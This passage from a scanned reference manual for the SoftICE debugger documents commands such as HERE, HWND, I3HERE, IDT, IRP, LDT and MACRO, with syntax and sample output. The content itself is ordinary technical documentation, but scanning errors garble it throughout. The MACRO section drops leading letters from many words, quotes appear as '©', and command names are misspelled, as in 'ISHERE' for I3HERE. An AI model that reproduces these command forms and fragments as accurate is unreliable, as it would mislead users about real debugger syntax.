SEGMENT Represents a heap segment. 
ALLOC Active heap entry 

FREE Inactive heap entry 

VABLOCK Virtually allocated block (VAB) 


%Example 
HEAP32 
Base Id Cmmt/Psnt/Rsvd Segments Flags Process 
00230000 01 0013/0013/00ED 1 00000002 csrss 
7F6F0000 02 0008/0008/00F8 1 00007008 csrss 
00400000 03 001C/001A/0024 1 00004003 csrss 
7F5D0000 04 0005/0005/001B 1 00006009 csrss 
00460000 05 00F6/00F1/001A 2 00003002 csrss 
005F0000 06 000B/000B/0005 1 00005002 csrss 
7F2D0000 07 002D/002D/02D3 1 00006009 csrss 
02080000 08 0003/0003/0001 1 00001062 csrss 
023C0000 09 0016/0014/00EA 1 00001001 csrss 


: HERE 

AHERE WINDOWS 3.1, WINDOWS 95, WINDOWS NT FLOWCONTROL 
AF7 

AGo to the current cursor line. 


%Syntax 
HERE 


%Use 

The HERE command executes until the program reaches the current cursor line. 
HERE is 

only available when the cursor is in the Code window. If the Code window is not 
visible or 

the cursor is not in the Code window, use the G command instead. Use the EC 
command 

(default key F6), if you want to move the cursor into the Code window. 


To use the HERE command, place the cursor on the source statement or assembly 
instruction 

that you want to execute to. Enter HERE or press the function key that HERE is 
programmed to (default key F7). 


The HERE command exits from SoftICE with a single, one-time execution 
breakpoint set. In 
addition, all sticky breakpoints are armed. 
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Execution begins at the current CS:EIP and continues until the address of the 
current cursor 

position in the Code window is encountered, the window pop-up key sequence is 
used, or a 

sticky breakpoint occurs. when SoftICE pops up, for any reason, the one-time 
execution 

breakpoint is cleared. 


If the Register window is visible when SoftICE pops up, all registers that have 
been altered 

since the HERE command was issued display with the bold video attribute. 

For Windows 3.1 


The non-sticky execution breakpoint uses an INT 3 style breakpoint. 


For Windows 95 and Windows NT 

The non-sticky execution breakpoint uses debug registers unless none are 
available, in which 

case, it uses INT 3. 


%Example 

Sets an execution breakpoint at the current cursor position, then exits from 
SoftICE and 

begins execution at the current CS:EIP. 

HERE 


: HWND 
AHWND Windows 3.1, Windows 95 SystemInformation 
ADisplay information on Window handles. 


%Syntax 
For Windows 3.1 
HWND [level] [task-name] 


For Windows 95 
HWND [-x][hwnd | [[level][process-name]] 


level Windows hierarchy number. © is the top level, 1 is the next level and 
so on. The window levels represent a parent child relationship. For 
example, a level 1window has a level 0 parent. For Windows NT, 

refer to the HWND on page 109. 

task-name Any currently loaded Windows task. These names are available with 
the TASK command. 

-X Display extended information about a window. 

hwnd Windows handle. 

process-name Name of any currently loaded process. 


%Use 

Specifying a window handle as a parameter displays only the information for 
that window 

handle. If you specify a window handle, you do not need to specify the optional 
parameters 

for level and process-name. 


%Output 

For each window handle, the following information is displayed: 
Class Name 

Class name or atom of class that this window belongs to. 

Window Procedure Address of the window procedure for this window. 


%Example 
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Sample output follows for the HWND command: 
HWND msword 

Abbreviated output follows for the HWND command: 
HWND -x winword 

Handle hQueue QOwner Class Procedure 
0F4C(0) 087D MSWORD #32769 DESKTOP 
0FD4(1) 080D MSWORD #32768 MENUWND 
22C4(1) 087D MSWORD OpusApp 0925:0378 
53E0(2) 087D MSWORD OpusPmt 0945:1514 
2764(2) 087D MSWORD a_sdm Msft 0F85:0010 
2800(3) 087D MSWORD OpusFedt 0F85:0020 
2844(3) 087D MSWORD OpusFedt 0F85:0020 
2428(2) 087D MSWORD OpusIconBar 0945:14FE 
2888(2) 087D MSWORD OpusFedt 0945:14D2 
Window Handle : (0288) Level (1) 
Parent : 16A7:000204CC 

Child : NULL 

Next : 16A7:00020584 

Owner : NULL 

Window RECT : (9,113) - (210,259) 
Client RECT : (10,114) - (189,258) 
hQueue : 1C97 

Size : 16 

QOwner : WINWORD 

hrgnUpdate : NULL 

wndClass : 16A7:281C 

Class : ListBox 

hInstance : (349E) (16 bit hInstance) 
lpfnwndProc : 2417:000057F8 

dwFlags1 : 40002 

dwStyle : 44A08053 

dwExStyle : 88 

dwFlags2 : 0 

ctrlID/hMenu : 03E8 

WndText : NULL 

unknown1 : 4734 

propertyList : NULL 

lastActive : NULL 

hSystemMenu : NULL 

unknown2 : © 

unknown3 : 0000 

classAtom : C036 

unknown4 : 4CAC 

unknown5 : A0000064 

Window Handle : (0288) Level (1) 


:HWND (NT) 
AHWND Windows NT SystemInformation 
ADisplay information on Window handles. 


%Syntax 
HWND [-x][-c] [hwnd-type | desktop-type | process-type | 


thread-type | module-type | class-name] 

-eXtended Display extended information about each window handle. 

-Children Force the display of window hierarchy when searching by thread-type, 
module-type, or class-name. 

hwnd-type Window handle or pointer to a window structure. 

desktop-type Desktop handle or desktop pointer to a window structure (3.51 
only). 

process-type, thread- 
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type or module-type Window owner-type. A value that SoftICE can interpret as 
being of a 

specific type such as process name, thread ID, or module image base. 

class name Name of a registered window class. 


%Use 
The HWND command enumerates and displays information about window handles. 


The HWND command allows you to isolate windows that are owned by a particular 
process, 
thread or module, when you specify a parameter of the appropriate type. 


The -eXtended option shows extended information about each window. 


When you specify the -eXtended option, or an owner-type as a parameter, the 
HWND 

command will not automatically enumerate child windows. Specifying the - 
Children option 

forces all child windows to be enumerated (regardless of whether they meet any 
specified 

search criteria). 


%Output 
For each HWND that is enumerated, the following information is displayed: 
Handle 
HWND handle (refer to OBJTAB on page 147 for more 
information). Each window handle is indented to show its child and 
sibling relationships to other windows. 
Class 
Registered class name for the window, if available (refer to CLASS on 
page 48 for more information). 
WinProc 
Address of the message callback procedure. Depending on the callback 
type, this value is displayed as a 32-bit flat address or 16-bit 
selector:offset. 
TID 
Owning thread ID. 
Module 
Owning module name (if available). If the module name is unknown, 
the module handle will be displayed as a 32-bit flat address or 16-bit 
selector:offset, depending on the module type. 


%Example 
The following example uses the HWND command without parameters or options: 
HWND 
Handle_Class WinProc_TID___ Module 
01001E #32769 (Desktop) 5FBFE425 24 winsrv 
050060 #32770 (Dialog) 60A29304 18 winlogon 
010044 SAS window class 022A49C4 18 winlogon 
010020 #32768 (PopupMenu) 5FBEDBD5 24 winsrv 
010022 #32769 (Desktop) 5FBFE425 24 winsrv 
010024 #32768 (PopupMenu) 5FBEDBD5 24 winsrv 
030074 Shell _Traywnd 0101775E 67 Explorer 
030072 Button 01012A4E 67 Explorer 
0800AA TrayNotifywnd 010216C4 67 Explorer 
03003E TrayClockWClass 01028C85 67 Explorer 
030078 MSTaskSwWClass 01022F69 67 Explorer 
030076 SysTabControl32 712188A8 67 Explorer 
05007A tooltips_class32 7120B43A 67 Explorer 
03003C tooltips_class32 7120B43A 67 Explorer 
2E00FO NDDEAgnt 016E18F1 4B nddeagnt 
1C0148 CLIPBOARDWNDCLASS 034F:2918 2C OLE2 
9B0152 DdeCommonWindowClass 77C2D88B 2C ole32 
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3200F2 Ole0bjectRpcWindow 77C2D73B 2C 01le32 
0800A2 DdeCommonWindowClass 77C2D88B 67 0le32 
030086 OleMainThreadwndClass 77C2DCF2 67 0le32 
030088 Ole0bjectRpcWindow 77C2D73B 67 0le32 
03008A ProxyTarget 71E6869A 67 shell32 

03008C ProxyTarget 71E6869A 67 shell32 

030070 ProxyTarget 71E6869A 67 shell32 

04007C ProxyTarget 71E6869A 67 shell32 

0400CC OTClass 0100D7F3 67 Explorer 

0300CA DDEMLEvent 5FC216AB 67 winsrv 

0300C6 DDEMLMom 60A2779D 67 00000000 

0300C0 #42 0BB7:0776 78 MMSYSTEM 

0300D2 WOWFaxClass 01F9F7A8 78 WOWEXEC 

060062 ConsoleWindowClass 5FCD23C7 2B winsrv 
0300B4 WOWExecClass 03CF:0B3E 78 WOWEXEC 
030068 Progman 0101B1D3 67 Explorer 

0EO0O0BC SHELLDLL_DefView 71E300E8 67 shell32 
040082 SysListView32 7121A0EC 67 shell32 
030080 SysHeader32 7120B06F 67 shell32 


Notes: You may have noticed that the output from the previous example 
enumerated two 

desktop windows (handles 1001E and 10022), each with its own separate window 
hierarchy. This is because the system can create more than one object of type 
Desktop, 

and each Desktop object has its own Desktop Window which defines the window 
hierarchy. If you use the HWND command in a context that does not have an 
assigned Desktop, the HWND command enumerates all objects of type Desktop. 
Because the system may have create more than one object of type Desktop, the 
HWND command accepts a Desktop-type handle as a parameter. This allows the 
window hierarchy for a specific Desktop to be enumerated. You can use the 
command 

OBJTAB DESK to enumerate all existing desktops in the system. 


The following is an example of using the HWND command for a specific window 
handle: 

HWND 400a0 

Handle Class WinProc TID Module 

0400A0 Progman 0101B1D3 74 Explorer 


The following is an example of enumerating only those windows owned by thread 
74: 
HWND 74 


Handle Class WinProc TID Module 

2F00FO Shell _TraywWnd 0101775E 74 Explorer 
0500CE Button 01012A4E 74 Explorer 

0500C4 TrayNotifyWwnd 010216C4 74 Explorer 
040074 TrayClockwWClass 01028C85 74 Explorer 
0500C6 MSTaskSwWClass 01022F69 74 Explorer 
0400C8 SysTabControl32 712188A8 74 Explorer 
3700F2 tooltips_class32 7120B43A 74 Explorer 
040066 tooltips_class32 7120B43A 74 Explorer 
0FOOBC DdeCommonwWindowClass 77C2D88B 74 o0le32 
040068 OleMainThreadwndClass 77C2DCF2 74 01le32 
0500CC Ole0bjectRpcWindow 77C2D73B 74 0le32 
2600BA ProxyTarget 71E6869A 74 shell32 

0400DO ProxyTarget 71E6869A 74 shell32 

0400CA ProxyTarget 71E6869A 74 shell32 

070094 ProxyTarget 71E6869A 74 shell32 

04009E OTClass 0100D7F3 74 Explorer 

480092 DDEMLEvent 5FC216AB 74 winsrv 

09004A DDEMLMom 60A2779D 74 00000000 
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0400A0 Progman 0101B1D3 74 Explorer 

0500C0 SHELLDLL_DefView 71E300E8 74 shell32 
070090 SysListView32 7121A0EC 74 shell32 
050096 SysHeader32 7120B06F 74 shell32 


Note: A process-name always overrides a module of the same name. To search by 
module, 

when there is a name conflict, use the module handle (base address or module- 
database 

selector) instead. Also, module names are always context sensitive. If the 
module is not 

loaded in the current context (or the CSRSS context), the HWND command 
interprets the module name as a class name instead. 


The following example shows the output when the -eXtended option is used: 
HWND -x 400a0 

Hwnd : 0400A0 (7F2D7148) 

Class Name : Progman 

Module : Explorer 

Window Proc : 0101B1D3 

Win Version : 4.00 

Title : Program Manager 

Desktop : 02001F (00402D58) 

Parent : 010022 (7F2D0C28) 

1st Child : 0500C0O (7F2D7600) 

Style : CLIPCHILDREN | CLIPSIBLINGS | VISIBLE | POPUP 
Ex. Style : TOOLWINDOW | A0000000 

Window Rect : 0, 0, 1024, 768 (1024 x 768) 

Client Rect : 0, 0, 1024, 768 (1024 x 768) 


:I 
AI Windows 3.1, Windows 95, Windows NT I/0Port 
AInput a value from an I/0 port. 


%Syntax 
I[size] port 


size 
port Port address. 


%Use 

The I command in most cases does an actual I/0 instruction so it is showing the 
actual state 

of the hardware port. In the case of virtualized ports, the actual data may not 
be the same as 

the virtualized data that an application would see. 


The only ports that SoftICE does not do 1/0 on are the interrupt mask registers 
(Port 21 and 
A1). For those ports, SoftICE shows the value that existed when SoftICE popped 


Up. 
Use the input from port commands to read and display a value from a hardware 
port. Input 


can be done from byte, word, or dword ports. If you do not specify size, the 
default is B. 


%Example 

Performs an input from port 21, which is the mask register for interrupt 
controller one. 

I 21 

Value Description 

B Byte 

W Wo rd 
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D DWORD 


:I1HERE 
AITAHERE Windows 3.1, Windows 95, Windows NT ModeControl 
APop up on embedded INT 1 instructions. 


%Syntax 
I1HERE [on | off] 


%Use 

Use the I1HERE command to specify that any embedded interrupt 1 bring up the 
SoftICE 

screen. This feature is useful for stopping your program in a specific 
location. Before popping 

up, SoftICE checks to see that there is really an INT 1 in the code. If there 
is not, SoftICE will 

not pop up. 


To use this feature, place an INT 1 into the code immediately before the 
location where you 

want to stop. When the INT 1 occurs, it brings up the SoftICE screen. At this 
point, the 

current EIP is the instruction after the INT 1 instruction. 

If you do not specify a parameter, the current state of I1HERE displays. 


The default is I1HERE off. 


This command is useful when you are using an application debugging tool such as 
BoundsChecker. Since these tools rely on INT 3's for breakpoint notifications, 
you should use 

INT 1s in your code so that the tools do not become confused when your 
hardwired 

interrupts occur. 


For Windows 3.1 and Windows 95 
VMM, the Windows memory management VxD, executes INT 1 instructions prior to 
certain fatal exits. If you have TI1HERE ON, you can trap these. The INT 1s 
generated by 
VMM are most often caused by a page fault with the registers set up as follows: 
EAX=faulting address 
ESI points to an ASCII message 
EBP points to a CRS (Client Register Structure as defined in the DDK include 
file 
VMM.INC). 


%Example 

Turns on I1HERE mode. Any INT 1s generated after this point bring up the 
SoftICE screen. 

I1HERE on 


: I3HERE 
AISHERE Windows 3.1, Windows 95, Windows NT ModeControl 
APop up on INT 3 instructions. 


%Syntax 
I3HERE [on | off] 


%Use 

Use the I3HERE command to specify that any interrupt 3 pop up SoftICE. This 
feature is 

useful for stopping your program in a specific location. 
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To use this feature, place an INT 3 into your code immediately before the 
location where you 

want to stop. When the INT 3 occurs, it brings up the SoftICE screen. At this 
point, the 

current EIP is the instruction after the INT 3 instruction. 


If you are developing a Windows program, the DebugBreak( ) Windows API routine 
performs an INT 3. 


If you do not specify a parameter, the current state of I3HERE displays. 

Note: If you are using an application debugging tool such as the Visual C 
debugger or 

NuMega's BoundsChecker, you should place INT 1s in your code instead of INT 3s. 
Refer to I1HERE on page 114. 


%Example 

Turns on ISHERE mode. Any INT 83s generated after this point cause SoftICE to 
pop up. 

ISHERE on 


When the command I3HERE==ON, and you are using a level -3 debugger, such as 
BoundsChecker, SoftICE traps on any INT 3 breakpoints installed by the level-3 
debugger. 

when this happens, set ISHERE==0FF, and use the GENINT command to reactivate 
the 

breakpoint. This returns control to the level -3 debugger, and SoftICE does not 
trap further 

INT 35. 

ISHERE off 

GENINT 3 


:IDT 
AIDT Windows 3.1, Windows 95, Windows NT SystemInformation 
ADisplay the Interrupt Descriptor Table. 


%Syntax 
IDT [interrupt-number] 


interrupt-number Interrupt-number to display information 
%Use 

The IDT command displays the contents of the Interrupt Descriptor Table after 
reading the 

IDT register to obtain its address. 


The IDT command without parameters displays the IDT's base address and limit, 
as well as 

the contents of all entries in the table. If you specify an optional interrupt- 
number, only 

information about that entry is displayed. 


For Windows NT 

Almost all interrupt handlers reside in NTOSKRNL, so it is very useful to have 
exports 

loaded for it so that the handler names are displayed. 


Note: NTOSKRNL must be the current symbol table (refer to TABLE on page 194) to 
view 

symbol names. 
%Output 

Each line of the display contains the following information: 

interrupt number 0 - OFFh (5Fh for Windows 3.1, Windows 95). 
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interrupt type One of the following: 

address Selector:offset of the interrupt handler. 
Type Description 

Call632 32-bit Call Gate 

Call616 16-bit Call Gate 

TaskG Task Gate 

TrapG16 16-bit Trap Gate 

Trap632 32-bit Trap Gate 

Int632 32-bit Interrupt Gate 

Int616 16-bit Interrupt Gate 


selector's DPL Selector's descriptor privilege level (DPL), which is either 0, 
1, 2 0r 3. 

present bit P or NP, indicating whether the entry is present or not present. 
Owner+Offset For Windows 95 and Windows NT only: Symbol or owner name plus 
the offset from that symbol or owner. 


%Example 
The following command shows partial output of the IDT command with no 
parameters: 
.rIDT 
Int Type Sel:0ffset Attributes Symbol/Owner 
IDTbase=C000ABBC Limit=02FF 
0000 Int632 0028:C0001200 DPL=0 P VMM(01)+0200 
0001 Int632 0028:C0001210 DPL=3 P VMM(01)+0210 
0002 Int632 0028:COOEEDFC DPL=0 P VTBS(01)+1D04 
0003 Int632 0028:C0001220 DPL=3 P VMM(01)+0220 
0004 Int632 0028:C0001230 DPL=3 P VMM(01)+0230 
0005 Int632 0028:C0001240 DPL=3 P VMM(01)+0240 
0006 Int632 0028:C0001250 DPL=0 P VMM(01)+0250 
0007 Int632 0028:C0001260 DPL=0 P VMM(01)+0260 
0008 TaskG 0068:00000000 DPL=0 P 
0009 Int632 0028:C000126C DPL=0 P VMM(01)+026C 
000A Int632 0028:C000128C DPL=0 P VMM(01)+028C 


The next command shows the contents of one entry in the IDT: 
.:IDT d 

Int Type Sel:0ffset Attributes Symbol/Owner 

000D Int632 0028:C00012B0O DPL=0 P VMM(01)+02B0 


:IRP 
AIRP Windows NT SystemInformation 
ADisplay information about an I/0 Request Packet (IRP). 


%Syntax 
IRP [irp-address] 


irp-address Address of the start of the IRP structure to he displayed. 


%Use 

The IRP command displays the contents of the 1/0 Request Packet and the 
contents of 

associated current I/0 stack located at the specified address. The command does 
not check for 

the validity of the IRP structure being shown, so any address will be accepted 
by SoftICE as 

an irp-address. 


The IRP fields shown by SoftICE are not documented in their entirety here, as 
adequate 

information about them can be found in NTDDK.H in the Windows NT DDK. A few 
fields 
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deserve special mention, however, since device driver writers find them 
particularly useful: 
Flags Flags used to define IRP attributes. 


StackCount The number of stack locations that have been allocated for the IRP, 
A 

common device driver bug is to access non-existent stack locations, so 

this value may be useful in determining when this has occurred. 

CurrentLocation This number indicates which stack location is the current one 
for the 

IRP. Again, this value, combined with the previous StackCount, can 

be used to track down IRP stack-related bugs. 


Cancel 

This boolean is set to TRUE if the IRP has been cancelled as a result 
of an IRP cancellation call. This happens when the IRP's result is no 
longer needed so the IRP will not complete. 

Tail.Overlay. 

CurrentStackLoc 

Address of current stack location. The contents of this stack location 
are displayed after the IRP, as illustrated in the example for this 
command. 

Cancel 

This boolean is set to TRUE if the IRP has been cancelled as a result 
of an IRP cancellation call. This happens when the IRP's result is no 
longer needed so the IRP will not complete. 


These fields in the current stack location may be useful: 

Major Function and Minor Function 

These fields indicate what type of request the IRP is being used for. 
The major function is used in determining which request handler will 
be called when an IRP is received by a device driver. 

Device Object 

Pointer to the device object that the IRP is currently stationed at. In 
other words, the IRP has been sent to, and is in the process of being 
received by, the device driver owning the device object. 

File Object 

Pointer to the file object associated with the IRP. It can contain 
additional information that serves as IRP parameters. For example, file 
system drivers use the file object path name field to determine the 
target file of a request. 

Completion Rout 

This field is set when a driver sets a completion routine for an IRP 
through the IoSetCompletionRoutine call. Its value is the address of 
the routine that will be called when a lower-level driver (associated 
with a stack location one greater than the current one) completes 
servicing of the IRP and signals that it has done so with 
IoCompleteRequest. 


%Example 

The following example shows the output for the IRP command: 
.:IRP eax 

MdlAddress * : 00000000 

Flags : 00000404 IRP_SYNCHRONOUS_API|IRP_CLOSE_OPERATION 
AssociatedIrp : 00000000 

&ThreadListEntry : FD8D9B18 

IoStatus : 00000000 

RequestorMode : 00 

PendingReturned : False 

StackCount : 03 

CurrentLocation : 03 

Cancel : False 

CancelIrql : 00 
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ApcEnvironment : 00 

Zoned : True 

UserIosb * : FD8D9B20 
UserEvent * : FB11FB40 
Overlay : 00000000 00000000 
CancelRoutine * : 00000000 
UserBuffer * : 00000000 
Tail.Overlay 
&DeviceQueueEntry : FD8D9B48 
Thread * : FD80A020 
AuxiliaryBuffer * : 00000000 
&ListEntry : FD8D9B60 
CurrentStackLoc * : FD8D9BCO 
OrigFileObject * : FD819E08 
Tail.Apc * : FD8D9B48 
Tail.ComplKey : 00000000 
CurrentStackLocation: 
MajorFunction : 12 IRP_MJ_CLEANUP 
MinorFunction : 00 

Control : 00 

Flags : 00 

Others : 00000000 00000000 00000000 00000000 
DeviceObject * : FD851E40 
FileObject * : FD819E08 
CompletionRout * : 00000000 
Context * : 00000000 


:LDT 
ALDT Windows 3.1, Windows 95, Windows NT SystemInformation 
ADisplay the Local Descriptor Table. 


%Syntax 
LDT [selector] 


selector Starting LDT selector to display. 


%Use 

The LDT command displays the contents of the Local Descriptor Table after 
reading its 

location from the LDT register. If there is no LDT, an error message will be 
printed. If you 

specify an optional selector, only information on that selector is displayed. 
If the starting 

selector is a GDT selector (bit 2 is 0), the GDT displays rather than the LDT. 
The first line of 

output contains the base address and limit of the LDT. 


For Windows 95 and Windows NT 

Even when there is no LDT, the LDT command can display an LDT you supply as a 
command parameter. This optional parameter can be a GDT selector that 
represents an LDT. 

You can locate selectors of type LDT with the GDT command. 


For Windows NT 

The LDT command is process specific and only works in processes that have an 
LDT. Use the 

ADDR command to determine which processes contain LDTs. Use ADDR to switch to 
those 

processes, then use the LDT command to examine their LDTS. 


%Output 
Each line of the display contains the following information: 
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selector value Lower two bits of this value reflect the descriptor privilege 
level. 

selector type 

Type Description 

Code16 16-bit code selector 

Data16 16-bit data selector 

Code32 32-bit code selector 

Data32 32-bit data selector 

Call632 32-bit Call Gate selector 

Call616 16-bit Call Gate selector 


selector base 

Linear base address of the selector. 

selector limit 

Size of the selector. 

selector DPL 

Selector's descriptor privilege level (DPL), either 0, 1, 2 or 3. 
present bit 

P or NP, indicating whether the selector is present or not present. 
segment attributes 

One of the following: 


%Example 
The following example shows sample output for the LDT command. 
. :LDT 
Sel. Type Base Limit DPL Attributes 
LDTbase=8008B000 Limit=4FFF 


0004 Reserved 00000000 00000000 0 NP 
000C Reserved 00000000 00000000 0 NP 
0087 Data16 80001000 00000FFF 3 P RW 
008F Data16 00847000 0000FFFF 3 P RW 
0097 Data16 0002DA80 0000021F 3 P_ RW 
009F Data16 00099940 000029FF 3 P RW 
00A7 Data16 0001BACO 000000FF 3 P_ RW 
00AF Data16 C11D9040 0000057F 3 P_RW 


Task632 32-bit Task Gate selector 

TaskG616 16-bit Task Gate selector 

Trap632 32-bit Trap Gate selector 

Trap616 16-bit Trap Gate selector 

Int632 32-bit Interrupt Gate selector 
Int616 16-bit Interrupt Gate selector 
Reserved Reserved selector 

Type Description 

RW Data selector is readable and writable. 
RO Data selector is read only. 

RE Code selector is readable and executable. 
EO Code selector is execute only. 

B TSsS's busy bit is set. 

Type Description 


: LHEAP 
ALHEAP Windows 3.1, Windows 95, Windows NT SystemInformation 
ADisplay the Windows local heap. 


%Syntax 
LHEAP [selector | module-name] 


selector LDT data selector. 
module-name Name of any 16-bit module. 


%Use 
The LHEAP command displays the data objects that a Windows program has 
allocated on 
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the local heap. If you do not specify a selector, the value of the current DS 
register is used. The 

specified selector is usually the Windows program's data selector. To find 
this, use the HEAP 

command on the Windows program you are interested in and look for an entry of 
type data. 

Each selector that contains a local heap is marked with the tag LH. 


If a module-name is entered, SoftICE uses the modules default data segment for 
the heap 
walk. 


For Windows 95 and Windows NT 

To find all segments that contain a local heap, use the HEAP command with the - 
L option. 

For Windows NT 


The LHEAP command only works if the current process contains a WOW box. 


%Output 
For each local heap entry the following information displays: 
offset 16-bit offset relative to the specified selector base address. 
size Size of the heap entry in bytes. 
type Type of entry. One of the following: 
Type Description 
FIX Fixed (not moveable) 
MOV Moveable 
FREE Available memory 
handle Handle associated with each element. For fixed elements, the handle is 
equal to the address that is returned from LocalAlloc( ). For moveable 
elements, the handle is the address that will be passed to LocalLock( ). 
At the end of the list, the total amount of memory in the local heap displays. 


%Example 
To display all local heap entries belonging to the GDI default local heap, use 
the following 
command: 
LHEAP gdi 
Offset Size Type Handle 
93D2 0046 Mov ODFA 
941E 0046 Mov 0C52 
946A 0046 Mov 40DA 
94B6 004E Mov 0C66 
950A 4A52 Mov 0E52 
Used: 19.3K 


: LINES 
ALINES Windows 3.1, Windows 95, Windows NT Customization 
AChange the number of lines for the SoftICE display. 


%Syntax 
For Windows 3.1 
LINES [25 | 43 | 50] 


For Windows 95 and Windows NT 
LINES [25 | 43 | 50 | 60] 


%Use 

The LINES command changes SoftIcE's character display mode. It allows different 
display 

modes: 25-line, 43-line, 50-line, and 60-line mode. The 43-, 50-, and 60-line 
modes are only 
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valid on VGA display adapters. 


Using LINES with no parameters displays the current state of LINES. The default 
number of 
display lines is 25. 


If you enter the ALTSCR command, SoftICE changes to 25-line mode automatically. 
If you 

change back to a VGA display and want a larger line mode, enter the LINES 
command again. 

To display in 50-line mode on a serial terminal, first place the console mode 
of the serial 

terminal into 50-line mode using the DOS MODE command. 


For Windows 95 and Windows NT 
You can display 60 lines for single monitor debugging. 


When debugging in serial mode, all line counts are supported for VGA displays. 


%Example 

To change the SoftICE display to 43-line mode if you have an EGA or VGA 
display, use the 

following command: 

LINES 43 


: LOCALS 
ALOCALS Windows 95, Windows NT Symbol/SourceCommand 
ALists local variables from the current stack frame. 


%Syntax 
LOCALS 


%Use 

Use the LOCALS command to list local variables from the current stack frame to 
the 

Command window. 


%Output 
The following information displays for each local symbol: 
Stack Offset 
Type definition 
. Value, Data, or structure symbol ( {...} ) 


The type of local determines whether a value, data, or structure symbol ( {...} 
) is displayed. If 

the local is a pointer, the data it points to is displayed. If it isa 
structure, the structure symbol 

is displayed. If the local is neither a pointer nor a structure, its value is 
displayed. 


Hint: You can expand structures, arrays, and character strings to display their 
contents. Use 

the WL command to display the Locals window, then double-click the item you 
want 

to expand. Note that expandable items are delineated with a plus (+) mark. 


%Example 
The following example displays the local variables for the current stack frame: 
. :LOCALS 
[EBP-4] struct_BOUNCEDATA * pdb=0x0000013F <{...}> 
[EBP+8] void * hWwnd=0x000006D8 
See Also TYPES, WL 
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:M 
AM Windows 3.1, Windows 95, Windows NT Miscellaneous 
AMove data. 


%Syntax 
M source-address 1 length dest-address 


source-address Start of address range to move. 
length Length in bytes. 
dest-address Start of destination address range. 


%Use 
The specified number of bytes are moved from the source-address to the dest- 
address. 


%Example 
Moves 2000h bytes (8KB) from memory location DS:1000h to ES:5000h. 
M ds:1000 1 2000 es:5000 


: MACRO 
AMACRO Windows 95, Windows NT Customization 
ADefine a new command that is a superset of SoftICE commands. 


%Syntax 
MACRO [macro-name] | [*] | [= © macro body''] 


macro-name Case-insensitive, 3-8 character name for the macro being defined, or 
the name of an existing macro. 

macro-body Quoted string that contains a list of SoftICE commands and 
parameters separated by semi-colons (;). 

* Delete one or all defined macros. 

= Define (or redefine) a macro. 


%Use 

The MACRO command is used to define new Macro commands that are supersets of 
existing 

SoftICE commands. Defined macros can be executed directly from the SoftICE 
ommand 

line. The MACRO command is also used to list, edit, or delete individual acros. 
Macros are 

directly related to breakpoint actions, as breakpoint actions are simply acros 
that do not 

have names, and can only be executed by the SoftICE breakpoint engine. 


If no options are provided, a list of all defined macros will be displayed, r 
if a macro-name is 

specified, that macro will be inserted into the command buffer so that it can e 
edited. 

when defining or redefining a macro, the following form of the macro command s 
used: 

MACRO macro-name = © macro-body'' 


The macro-name parameter can be between 3 and 8 characters long, and may ontain 
any 

alphanumeric character or underscore (_). If the macro-name parameter pecifies 
an existing 

macro, the existing macro will be redefined. The macro-name cannot be a 
uplicate of an 

existing SoftICE command. The macro-name must be followed by an equal sign 
°='', which 
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must be followed by the quoted string that defines the macro-body. 


The macro-body parameter must be embedded between beginning and ending uotation 
marks (°°). The macro-body is made up of a collection of existing SoftICE 
ommands, or 

defined macros, separated by semi-colons. Each command may contain ppropriate 
‘literal' 

parameters, or can use the form%<parameter#>, where parameter# must be etween 1 
and 8. 

When the macro is executed from the command line, any parameter references ill 
expand 

into the macro-body from the parameters specified when the command was xecuted. 
If you 

need to embed a literal quote character ('') or a percent sign (%) within the 
acro body 

precede the character with a backslash character (\). Because the backslash 
haracter is used for 

escape sequences, to specify a literal backslash character, use two onsecutive 
backslashes (\\}). 

The final command within the macro-body does not need to be terminated by a 
emi-colon. 


You can define macros in the SoftICE Loader using the same syntax described 
ere. When 

you load SoftICE, each macro definition is created and available for use. 
oftICE displays a 

message for each defined macro to remind you of it presence. Since macros 
onsume memory, 

you can set the maximum number of named and unnamed macros (that is, reakpoint 
actions) that can be defined during a SoftICE session. The default value of 2 
is also the 

minimum value. The maximum value is 256. 


Note: A macro-body cannot be empty. It must contain one or more non-white pace 
characters. A macro-body can execute other macros, or define another macro, r 
even a 

breakpoint with a breakpoint action. A macro can even refer to itself, lthough 
recursion of macros is not extremely useful because there is no programmatic ay 
to 

terminate the macro. Macros that use recursion execute up to the number of imes 
that 

SoftICE permits (32 levels of recursion are supported), no more, and no less. 
ven 

with this limitation, macro recursion, although crude, can be useful for alking 
nested 

or linked data structures. To get a recursive macro to execute as you expect, 
ou have to 

devise clever macro definitions. 


%Example 

The following is an example of using the MACRO command without parameters or 
ptions: 

. MACRO 

XWHAT = "WHAT EAX;WHAT EBX;WHAT ECX; WHAT EDX; WHAT ESI; WHAT EDI" 

OOPS = "I3HERE OFF;GENINT 3" 

1shot = "bpx eip do \"bc bpindex \"" 


Note: The name of the macro is listed to the left, and the macro body efinition 
to the right. 

The following are more examples of basic usage of the MACRO command: 

.:MACRO * Delete all named macros. 

.:MACRO oops * Delete the macro named oops. 

. MACRO xwhat Edit the macro named xwhat. 
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Note: Because macros can be redefined at any time, when you use the edit form f 
the 

MACRO command (MACRO macro-name) the macro definition will be placed in the 
edit buffer so that it can be edited. If you do not wish to modify the macro, 
ress ESC. 

The existing macro will remain unchanged. If you modify the macro-body ithout 
changing the macro name, the macro will be redefined (assuming the syntax is 
orrect!) 


The following is a simple example of a macro definition: 
. MACRO help = ©©h'' 


The next example uses a literal parameter within the macro-body. Its sefulness 
is limited to 

specific situations or values: 

. MACRO help = ©h exp'' 


In this example, the SoftICE H command is executed with the parameter EXP very 
time the 
macro executes. This causes the help for the SoftICE EXP command to display. 


This is a slightly more useful definition of the same macro: 
. MACRO help= © ‘help %1'' 


In this example, an optional parameter was defined to pass to the SoftICE H 
ommand. If the 

command is executed with no parameters, the argument to the H command is mpty, 
and the 

macro performs exactly as the first definition; help for all commands is 
isplayed. If the macro 

executes with 1 parameter, the parameter is passed to the H command, and the 
elp for the 

command specified by parameter 1 is displayed. For execution of macros, all 
arameters are 

considered optional, and any unused parameters are ignored. 


The following are examples of legal macro definitions: 


. MACRO qexp = © ‘addr explorer; query %1'' qexp 
or 

qexp 1 40000 

. MACRO 1shot = © ’bpx %1 do \''bc bpindex\'''' ishot eip 
or 

1shot @esp 

. MACRO ddt = © dd thread'' ddt 

. MACRO ddp = © dd process'' ddp 

.:MACRO thr = © thread %1 tid'' thr 

or 

thr -x 


The following are examples of illegal macro definitions, with an explanation nd 
a corrected 
example: 


Illegal Definition: MACRO dd = © dd dataaddr'' 
Explanation: This is a duplication of a SoftICE command. SoftICE commands annot 
be 


redefined. 
Corrected Example: MACRO dda = © ‘dd dataaddr'' 
Illegal Definition: MACRO aa = © addr %1'' 
